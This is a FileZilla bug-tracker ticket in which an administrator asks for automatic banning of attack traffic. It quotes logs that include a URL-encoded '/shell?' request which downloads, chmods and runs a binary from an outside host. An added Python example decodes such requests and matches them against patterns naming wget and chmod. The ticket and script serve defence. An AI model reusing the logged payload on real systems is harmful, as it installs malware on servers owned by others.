Opened 7 years ago
Closed 7 years ago
#11516 closed Feature request (rejected)
Increase in remote attacks against FileZilla FTP Server - Can better protection be implemented
Reported by: | surr34l | Owned by: | |
---|---|---|---|
Priority: | normal | Component: | FileZilla Server |
Keywords: | security attacks protection | Cc: | |
Component version: | 0.9.60.2 | Operating system type: | Windows |
Operating system version: | Windows 10 1709 |
Description
I've seen an increase in attacks against FileZilla FTP Server installs I'm administering.
While it looks like these attacks are unsuccessful, they are getting annoying, and I'd like to ensure my installs are as protected as possible. They are on high ports, but security by obscurity is not real security, only a deterrent until port scanners come along and information is passed around.
```
(002024)2/7/2018 8:12:33 AM - (not logged in) (123.249.XXX.XXX)> Connected on port [serverport], sending welcome message...
(002024)2/7/2018 8:12:33 AM - (not logged in) (123.249.XXX.XXX)> GET / HTTP/1.1
(002059)2/12/2018 20:34:06 PM - (not logged in) (104.207.xxx.xxx)> GET /shell?%77%67%65%74%20%2D%50%20%2F%74%6D%70%20%68%74%74%70%3A%2F%2F%68%66%73%2E%6D%68%61%63%6B%65%72%2E%63%63%3A%39%32%37%38%2F%6C%69%6E%75%78%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%37%37%20%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D%3B%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D HTTP/1.1
(002059)2/12/2018 20:34:06 PM - (not logged in) (104.207.XXX.XXX)> Referer: http://filezilla.server.ip.address:port/shell?%77%67%65%74%20%2D%50%20%2F%74%6D%70%20%68%74%74%70%3A%2F%2F%68%66%73%2E%6D%68%61%63%6B%65%72%2E%63%63%3A%39%32%37%38%2F%6C%69%6E%75%78%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%37%37%20%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D%3B%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D
(002060)2/12/2018 20:34:06 PM - (not logged in) (104.207.XXX.XXX)> Accept-Language: zh-cn
(002060)2/12/2018 20:34:06 PM - (not logged in) (104.207.XXX.XXX)> Host: filezilla.server.ip.address:port
```
Manual entry and maintenance of an IP Blacklist is cumbersome and time-consuming, as indicated here - https://trac.filezilla-project.org/ticket/8855
I would like to see an option to automatically implement kick and ban length already configured in settings for specific commands coming in that match attack patterns, even if I have to maintain my own list of patterns.
More complete logs can also be provided upon request, as there are a lot more entries with each attempt mucking up my logs and console.
You can safely ignore these connections; they are utterly harmless.
In a future version, a feature will be added to not show connections from non-logged-in users in the log.
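An offline way to get the pattern-based list the description asks for, as an added example that is not part of the ticket or of FileZilla Server: it scans log lines shaped like the excerpt above, flags pre-login sessions that sent an HTTP request line to the FTP port, and URL-decodes the target so it can be checked against an admin-maintained pattern list. The line shape is assumed from the excerpt; the pattern list, function name and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Line shape assumed from the excerpt in the ticket:
#   (session)timestamp - (user) (ip)> text
LINE_RE = re.compile(
    r"^\((?P<session>\d+)\)(?P<ts>.+?) - \((?P<user>[^)]*)\) "
    r"\((?P<ip>[^)]+)\)> (?P<text>.*)$"
)
# An HTTP request line arriving on the FTP control channel.
HTTP_RE = re.compile(
    r"^(?:GET|POST|HEAD|PUT|OPTIONS|CONNECT) (?P<target>\S+) HTTP/\d\.\d$"
)
# Hypothetical admin-maintained patterns, matched after URL-decoding.
PATTERNS = [re.compile(p, re.I) for p in (r"\bwget\b", r"\bchmod\b", r"/shell\?")]

# Constructed sample lines (documentation addresses, placeholder host).
SAMPLE = [
    "(000001)2/7/2018 8:12:33 AM - (not logged in) (192.0.2.10)> Connected on port 2121, sending welcome message...",
    "(000001)2/7/2018 8:12:33 AM - (not logged in) (192.0.2.10)> GET / HTTP/1.1",
    "(000002)2/12/2018 20:34:06 PM - (not logged in) (198.51.100.7)> GET /shell?%77%67%65%74%20-P%20%2Ftmp%20http%3A%2F%2Fexample.invalid%2Fx HTTP/1.1",
    "(000002)2/12/2018 20:34:06 PM - (not logged in) (198.51.100.7)> Host: ftp.example.invalid:2121",
    "(000003)2/12/2018 20:40:00 PM - (not logged in) (203.0.113.5)> USER alice",
]

def scan(lines):
    """Map each pre-login IP that sent HTTP to its (reason, decoded target) hits."""
    hits = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["user"] != "not logged in":
            continue
        req = HTTP_RE.match(m["text"])
        if not req:
            continue  # greeting, header lines, or a real FTP command
        decoded = unquote(req["target"])
        matched = any(p.search(decoded) for p in PATTERNS)
        reason = "http-on-ftp+pattern" if matched else "http-on-ftp"
        hits.setdefault(m["ip"], []).append((reason, decoded))
    return hits

if __name__ == "__main__":
    for ip, found in scan(SAMPLE).items():
        for reason, decoded in found:
            print(f"{ip}\t{reason}\t{decoded}")
```

The output is a candidate list for review before anything is added to the server's IP filter; header lines such as `Host:` are skipped because the request line already identifies the session.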